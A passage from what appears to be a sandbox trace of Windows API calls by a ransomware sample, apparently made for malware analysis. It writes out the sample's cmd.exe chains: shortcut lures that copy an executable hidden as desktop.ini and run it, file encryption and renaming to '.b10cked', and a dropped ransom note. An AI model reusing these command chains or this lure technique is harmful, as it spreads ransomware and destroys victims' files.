\"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x71 [0132.465] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0132.465] CharUpperBuffW (in: lpsz="explorer.exe \"5OwEKsaDhMyqwxmS\" & type \"5OwEKsaDhMyqwxmS\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x72 | out: lpsz="EXPLORER.EXE \"5OWEKSADHMYQWXMS\" & TYPE \"5OWEKSADHMYQWXMS\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x72 [0132.465] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0132.465] CoInitialize (pvReserved=0x0) returned 0x0 [0132.465] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0132.466] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0132.466] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0132.467] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0132.468] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"5OwEKsaDhMyqwxmS\" & type \"5OwEKsaDhMyqwxmS\\desktop.ini\" > \"%TEMP%\\8rav86pb.exe\" && \"%TEMP%\\8rav86pb.exe\"") returned 0x0 [0132.468] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0132.468] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0132.468] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0132.468] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS.lnk", fRemember=0) returned 0x0 [0132.475] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0132.475] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0132.475] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0132.475] CoUninitialize () [0132.476] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0132.476] ReleaseMutex (hMutex=0xf8) returned 1 [0132.476] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0132.476] ReleaseMutex (hMutex=0xf8) returned 1 [0132.476] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0132.476] ReleaseMutex (hMutex=0xf8) returned 1 [0132.476] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0132.476] ReleaseMutex (hMutex=0xf8) returned 1 [0132.476] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\Oases7ZDuwJ0FV.xls" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\oases7zduwj0fv.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0132.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10c96 [0132.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.476] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=18926541921) returned 1 [0132.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10c96 [0132.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10c96 [0132.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x10c96 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10c96 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10c96 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10c96 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10c96 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10c96 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10c96 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0132.477] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x107ae [0132.477] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0132.478] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0132.478] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0132.478] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x10c96 [0132.478] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0132.479] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0132.479] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0132.479] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x10c96 [0132.479] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0132.479] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0132.479] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x864a, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x864a, lpOverlapped=0x0) returned 1 [0132.479] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0132.479] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x864a, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x864a, lpOverlapped=0x0) returned 1 [0132.479] SetFilePointer (in: hFile=0x114, lDistanceToMove=-34378, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x864c [0132.480] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x864a, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x864a, lpOverlapped=0x0) returned 1 [0132.480] SetFilePointer (in: hFile=0x114, lDistanceToMove=-34378, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x864c [0132.480] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x864a, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x864a, lpOverlapped=0x0) returned 1 [0132.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Oases7ZDuwJ0FV.xls", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0132.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Oases7ZDuwJ0FV.xls", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Oases7ZDuwJ0FV.xls", lpUsedDefaultChar=0x0) returned 18 [0132.484] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x10c96 [0132.484] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0132.484] CloseHandle (hObject=0x114) returned 1 [0132.485] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\Oases7ZDuwJ0FV.xls", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS") returned 0x2d [0132.486] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\") returned 0x21 [0132.486] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xba0, dwThreadId=0xb5c)) returned 1 [0132.488] CloseHandle (hObject=0x110) returned 1 [0132.488] CloseHandle (hObject=0x114) returned 1 [0132.488] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0132.489] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0132.489] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount1=34, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount2=51) returned 1 [0132.489] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0132.489] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0132.489] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount1=34, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0132.489] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0132.489] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0132.489] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0132.489] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\") returned 0x21 [0132.489] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0132.489] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0132.489] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xb58, dwThreadId=0xbdc)) returned 1 [0132.492] CloseHandle (hObject=0x110) returned 1 [0132.492] CloseHandle (hObject=0x114) returned 1 [0132.492] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\bl0cked-readme.rtf")) returned 0xffffffff [0132.493] GetLastError () returned 0x2 [0132.493] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0132.494] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\bl0cked-readme.rtf")) returned 0x20 [0132.495] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0132.495] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0132.495] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0132.495] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0132.495] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0132.495] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0132.495] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0132.495] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\") returned 0x21 [0132.495] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0132.495] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0132.495] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew") returned 0x20 [0132.496] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x13e | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x13e [0132.496] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0132.496] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & del /f /q 